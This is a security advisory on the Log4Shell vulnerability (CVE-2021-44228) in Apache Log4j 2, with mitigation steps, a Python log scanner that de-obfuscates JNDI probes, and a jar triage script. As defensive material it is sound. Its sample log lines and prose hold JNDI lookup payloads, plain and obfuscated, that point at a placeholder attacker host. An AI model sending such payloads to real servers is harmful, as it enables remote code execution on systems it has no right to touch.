CVE-2021-44228
Discovered: December 10th, 2021
Impacted Tech:
Apache Log4j 2 versions 2.0-beta9 through 2.14.1
Apache Struts 2 and any other software that bundles Log4j 2
Attacker Location:
External
Highlights:
Log4j 2 is an open source Java logging library developed and maintained by Apache.
A zero-day vulnerability, since named Log4Shell, gives an attacker remote code execution against any application that logs attacker-controlled input with Log4j 2. The attacker does not need access to a log file: Log4j evaluates lookup expressions inside logged messages, so a routinely logged request field (a User-Agent header, a username, a search parameter) that contains a JNDI lookup such as ${jndi:ldap://attacker-host/a} makes the vulnerable server connect to the attacker's server, retrieve a Java object and execute it.
Exploitation is reliable, requires no authentication, and needs nothing more than the ability to get a string logged.
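As an added illustration (not part of the original advisory or of Log4j itself): the attack shape is a request whose logged field carries a lookup string, and a first-line detection is to hunt for that string in access logs after undoing the obfuscations attackers layer on top of it. The log lines below are constructed, attacker.example is a placeholder host, and the lookup evaluator models only the handful of Log4j lookups commonly used to hide the word jndi, not Log4j's full lookup language.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: nothing nested inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are hunting for once obfuscation has been peeled away.
JNDI_PAYLOAD = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Evaluate one innermost lookup the way an attacker relies on Log4j doing it.

    Deliberate subset (assumption: enough for the common evasions, not a full
    Log4j lookup implementation):
      ${lower:X} / ${upper:X}  -> case-changed X
      ${name:-X}               -> X, the default used when ``name`` is unset
                                  (covers ${::-j} and ${env:NOPE:-j})
    Anything else, including ${jndi:...} itself, is left in place.
    """
    if inner.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if inner.startswith("upper:"):
        return inner[len("upper:"):].upper()
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then collapse nested lookups inside-out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan(lines):
    """Return (1-based line number, de-obfuscated JNDI payload) for each hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = JNDI_PAYLOAD.search(normalize(line))
        if match:
            hits.append((lineno, match.group(0)))
    return hits


# Constructed access-log sample: one benign request, three probes (plain,
# lower-lookup obfuscated, URL-encoded default-value obfuscated), and a
# benign-looking non-JNDI lookup that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.6 - - [10/Dec/2021:14:02:16 +0000] "GET /price?tpl=${date:yyyy} HTTP/1.1" '
    '200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, payload in scan(SAMPLE_LOG):
        print(f"line {lineno}: {payload}")
```

Matching on the normalized text rather than the raw line is the point: a rule that only greps for the literal ${jndi: misses the second and third probes, while a rule that flags every ${ in user input drowns in false positives. In production the same normalize step belongs in front of whatever SIEM rule you write.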
This vulnerability is rated critical, and anyone running an application that uses Log4j 2 should update it to version 2.15.0 or later immediately (the Apache Log4j security page tracks the current fixed release).
If updating to version 2.15.0 is not possible, the vulnerability can be mitigated on Log4j 2.10 and later by setting the following system property to "true" when starting the Java virtual machine:
log4j2.formatMsgNoLookups = true
(-Dlog4j2.formatMsgNoLookups=true on the JVM command line, or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
Versions before 2.10 ignore this property. For those, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar and restart the application; this also works on 2.10 through 2.14.1 where changing JVM flags is impractical.
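Also added here, not taken from the advisory or from the Log4j project: a small triage script that decides, per log4j-core jar, whether the upgrade has already happened, whether the interim mitigations apply, and which one. It reads Implementation-Version from the jar manifest (falling back to a log4j-core-2.x.y.jar file name, an assumption about how the jar is named) and checks for the JndiLookup class; the version thresholds are the ones stated above (affected from 2.0-beta9, property honoured from 2.10, fixed in 2.15.0). The build_fake_jar helper is a constructed stand-in so the script runs offline; point triage at real jar bytes in practice.

```python
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(-\w+)?")

# Thresholds as (major, minor, patch, release-flag); flag 0 = pre-release.
FIRST_AFFECTED = (2, 0, 0, 0)      # 2.0-beta9 (pre-release granularity is coarse)
PROPERTY_HONOURED = (2, 10, 0, 1)  # log4j2.formatMsgNoLookups exists from 2.10
FIXED = (2, 15, 0, 1)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0), which sorts below 2.0."""
    m = VERSION_RE.search(text or "")
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def triage(jar_bytes: bytes, jar_name: str = "") -> dict:
    """Classify one log4j-core jar and say which mitigation applies."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if MANIFEST in names:
            manifest = jar.read(MANIFEST).decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if m:
                version = parse_version(m.group(1))
    if version is None:
        version = parse_version(jar_name)  # assumption: log4j-core-2.x.y.jar naming
    has_jndi = JNDI_LOOKUP_CLASS in names

    if version is None:
        status, advice = "unknown", "version not determinable; inspect manually"
    elif version < FIRST_AFFECTED:
        status, advice = "out-of-scope", "Log4j 1.x is a different code base; not CVE-2021-44228"
    elif version >= FIXED:
        status, advice = "patched", "2.15.0 or later; no action for this CVE"
    elif not has_jndi:
        status, advice = "mitigated", "JndiLookup.class already removed; still schedule the upgrade"
    elif version >= PROPERTY_HONOURED:
        status, advice = ("vulnerable-property-ok",
                          "upgrade; interim: -Dlog4j2.formatMsgNoLookups=true "
                          "or remove JndiLookup.class")
    else:
        status, advice = ("vulnerable-property-ignored",
                          "upgrade or remove JndiLookup.class; "
                          "formatMsgNoLookups has no effect before 2.10")
    return {"version": version, "has_jndi_lookup": has_jndi,
            "status": status, "advice": advice}


def build_fake_jar(version: str, with_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar: manifest plus an optional
    JndiLookup entry holding only the class-file magic. Not a real Log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.9.1", True), ("2.14.1", False),
                      ("2.15.0", True), ("2.0-beta9", True), ("1.2.17", False)]:
        r = triage(build_fake_jar(ver, keep), f"log4j-core-{ver}.jar")
        print(f"{ver:10} jndi={keep!s:5} {r['status']:27} {r['advice']}")
```

The manifest check matters more than the file name: shaded and fat jars rename or embed log4j-core, so an inventory built from file names alone misses copies that the manifest or the class path still reveals. Walking every jar on a host and calling triage on the ones that contain the JndiLookup path (or the rest of org/apache/logging/log4j/core/) is the practical way to use it.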
References:
NVD – CVE-2021-44228 (nist.gov)
Log4j – Apache Log4j Security Vulnerabilities
CVE-2021-44228 – Log4j 2 Vulnerability Analysis – Randori Attack Team
Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
